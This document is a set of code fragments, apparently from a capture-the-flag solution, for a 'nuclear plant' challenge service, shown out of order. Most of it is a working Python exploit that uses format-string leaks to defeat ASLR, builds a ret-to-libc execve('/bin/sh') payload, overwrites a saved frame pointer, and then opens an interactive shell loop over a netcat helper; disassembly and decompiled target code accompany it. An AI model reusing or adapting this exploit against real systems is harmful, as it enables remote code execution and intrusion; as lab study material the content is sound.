vanhoefm

function validate() {
	var x = document.forms["formxx"]["pwz"].value;
	alert(x);
	if (x == null || x == "") {
		alert("Password must be filled out");
		return false;
	}

	if (!x.match(/^[A-Za-z]+$/)) {
		alert("Bad charset");

vanhoefm

# -------------- netcatlib.py -----------------------------------
import socket

class Netcat:
  # TODO: ip and port should be optionaly, and an open() method should be added
	# TODO: specify a timeout argument as well?
	def __init__(self, ip, port):
		self.buff = ""
		self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		self.soc.connect((ip, port))

vanhoefm

  call   0x80486d0 <printf@plt>
  movl   $0x8049f3a,(%esp)
  call   0x8048750 <puts@plt>
  mov    -0xc(%ebp),%eax
  leave     ; equivalent to movl %ebp, %esp
            ;               popl %ebp
  ret

vanhoefm

; Dump of assembler code for function printf:
   push   %ebp          ; save old frame pointer
   mov    %esp,%ebp
   push   %ebx
   call   0xb7e8ba0f
   add    $0x10dd5b,%ebx
   sub    $0xc,%esp
   lea    0xc(%ebp),%eax
   mov    %eax,0x8(%esp)
   mov    0x8(%ebp),%eax

vanhoefm

# Step 4 --- Test whether we've got our shell and let the magic happen
nc.write("echo \"GOT A SHELL\"\n")
nc.read_until("GOT A SHELL\n")
print "\nSUCCESS! We have a shell!\n"

while True:
	command = raw_input("$ ")
	nc.write(command + "\n")

	# quick and dirty way to detect end of output

vanhoefm

# Step 3 --- Exploit: trigger the payload so we get a nice shell
# minus 4 because leave does "mov %ebp, %esp" and then "pop %ebp"
target_ebp_value = location_payload - 4
ebp_ho_count = ((target_ebp_value >> 16) % 0x10000)
ebp_lo_count = (target_ebp_value % 0x10000)

EXPLOIT = dword_to_bitstring(location_ebp_printf + 2)
EXPLOIT += dword_to_bitstring(location_ebp_printf)

if ebp_ho_count < ebp_lo_count:

vanhoefm

# Step 2 --- Payload: place the constructed stack which we will execute subsequently
PAYLOAD = dword_to_bitstring(addrexecve)              # address of execve
PAYLOAD += "AAAA"                                     # fake return addr
PAYLOAD += dword_to_bitstring(location_payload + 20)  # ptr to /bin/sh
PAYLOAD += dword_to_bitstring(location_payload + 28)  # ptr to argv
PAYLOAD += dword_to_bitstring(location_payload + 28)  # ptr to envp
PAYLOAD += "/bin/sh"

nc.read_until("Your choice: ")
nc.write("1" + "\n")

vanhoefm

# Step 1c--- Get the address of execve
LEAKFORKADDR = dword_to_bitstring(location_got_fork)
LEAKFORKADDR += "%22$s:ENFORK:"

nc.read_until("Your choice: ")
nc.write("1" + "\n")

nc.read_until("Insert name: ")
nc.write(LEAKFORKADDR+"A"*(100-len(LEAKFORKADDR))+"\x01\x01"*4+"\xFF\xFF"+"\n")
nc.read_until("Uranium in nuclear plant \"")

vanhoefm

import netcatlib

# Step 0 --- Connect to the target
nc = netcatlib.Netcat("localhost", 4444)
print "[+] Connected"

# Step 1a --- Defeating ASLR with information leakage: location of stack
INFOLEAK = "%10$p:ENDEBP:%11$p:ENDRET:"

nc.read_until("Your choice: ")

vanhoefm

int __cdecl handle_plant_creation(int a1)
{
  puts("Creating new plant..");
  plantid = *(_DWORD *)(a1 + 5600);
  plant_info = (char *)(a1 + 112 * plantid);
  memset(plant_info, 0, 112);

  ask_for_string((int)"Insert name: ", &entered_plant_name, 0x70u);
  *((_WORD *)plant_info + 55) = plantid;
  [..]